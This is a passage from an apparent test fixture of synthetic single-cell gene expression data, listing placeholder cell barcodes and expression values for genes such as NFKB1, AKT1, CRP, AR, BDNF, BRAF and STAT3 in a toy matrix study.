"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NFKB1 Expression": {
"name": "NFKB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.58,
2.32,
1.0,
1.0,
2.0,
2.0,
2.32,
2.58,
2.58,
1.58,
1.0,
1.58,
2.32,
2.0,
1.58,
2.32,
2.0,
2.0,
2.81,
2.32,
2.0,
2.81,
2.58,
1.0,
2.32,
1.0,
2.58,
2.32,
1.58,
3.0,
2.81,
2.81,
1.0,
2.0,
2.58,
2.81,
1.0,
2.32,
2.58,
2.81,
2.0,
1.0,
3.0,
1.0,
2.0,
2.0,
2.32,
2.81,
2.58,
2.58,
1.58,
2.32,
2.81,
2.32,
2.0,
1.0,
3.0,
2.58,
1.0,
2.81,
2.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"AKT1 Cells": {
"name": "AKT1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"AKT1 Expression": {
"name": "AKT1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
1.58,
2.0,
2.0,
3.0,
2.58,
3.0,
1.0,
2.81,
1.58,
2.0,
3.0,
3.0,
2.0,
1.0,
1.58,
2.81,
2.0,
1.0,
2.0,
2.0,
2.81,
1.58,
2.58,
2.32,
2.0,
2.0,
2.32,
1.58,
1.58,
1.58,
1.0,
2.32,
3.0,
1.0,
3.0,
1.0,
2.58,
1.58,
2.32,
2.0,
2.81,
3.0,
3.0,
2.0,
2.0,
1.0,
1.0,
2.58,
2.32,
2.81,
2.58,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CRP Cells": {
"name": "CRP Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CRP Expression": {
"name": "CRP Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
1.58,
2.81,
2.0,
2.0,
2.81,
2.32,
2.0,
1.0,
1.58,
2.58,
1.58,
2.58,
2.32,
2.81,
3.0,
2.32,
1.58,
2.58,
1.0,
2.58,
1.58,
2.81,
2.81,
2.32,
2.0,
2.0,
1.58,
2.0,
1.58,
2.58,
2.32,
2.81,
1.58,
2.32,
1.0,
1.0,
2.32,
2.32,
3.0,
2.0,
2.0,
2.32,
3.0,
1.58,
3.0,
2.32,
1.0,
3.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"AR Cells": {
"name": "AR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"AR Expression": {
"name": "AR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
1.0,
2.0,
3.0,
2.81,
1.0,
2.58,
2.81,
1.58,
2.58,
1.0,
2.32,
1.58,
1.58,
1.58,
2.81,
2.32,
2.58,
1.58,
2.58,
3.0,
1.0,
2.58,
2.32,
2.58,
3.0,
2.58,
2.0,
3.0,
3.0,
2.58,
2.81,
2.81,
2.81,
2.58,
1.0,
1.58,
1.0,
3.0,
2.32,
1.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BDNF Cells": {
"name": "BDNF Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BDNF Expression": {
"name": "BDNF Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.81,
2.32,
1.0,
1.58,
3.0,
1.0,
2.0,
3.0,
2.0,
2.58,
3.0,
3.0,
1.0,
1.0,
1.0,
2.0,
1.0,
3.0,
2.32,
2.0,
1.58,
2.81,
2.58,
1.58,
2.32,
1.0,
2.81,
3.0,
2.58,
2.0,
2.58,
2.0,
2.58,
2.32,
2.32,
2.32,
2.81,
2.32,
2.58,
1.58,
2.81,
3.0,
3.0,
1.0,
2.58,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRAF Cells": {
"name": "BRAF Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRAF Expression": {
"name": "BRAF Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.58,
2.32,
2.58,
3.0,
3.0,
2.0,
2.0,
3.0,
1.58,
2.32,
1.0,
2.32,
2.81,
2.32,
1.0,
3.0,
3.0,
3.0,
1.58,
2.58,
2.0,
2.58,
2.0,
2.32,
2.81,
3.0,
2.0,
1.58,
1.58,
1.0,
2.32,
1.0,
3.0,
1.58,
2.81,
3.0,
1.0,
1.58,
2.32,
3.0,
1.58,
1.0,
3.0,
1.58,
2.32,
2.81,
2.0,
2.0,
2.32,
2.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"STAT3 Cells": {
"name": "STAT3 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"STAT3 Expression": {
"name": "STAT3 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.81,
2.81,
3.0,
2.81,
2.58,
1.58,
2.81,
2.0,
2.58,
2.0,
2.0,
1.0,
3.0,
2.58,
1.0,
2.58,
2.32,
2.81,
2.58,
3.0,
2.32,
1.0,
2.58,
2.58,
2.58,
3.0,
2.81,
1.0,
1.0,
2.32,
1.58,
1.58,
1.0,
2.32,
2.32,
2.0,
1.58,
2.58,
3.0,
2.58,
3.0,
2.58,
2.32,
1.58,
3.0,
2.58,
2.58,
3.0,
2.32,
2.58,
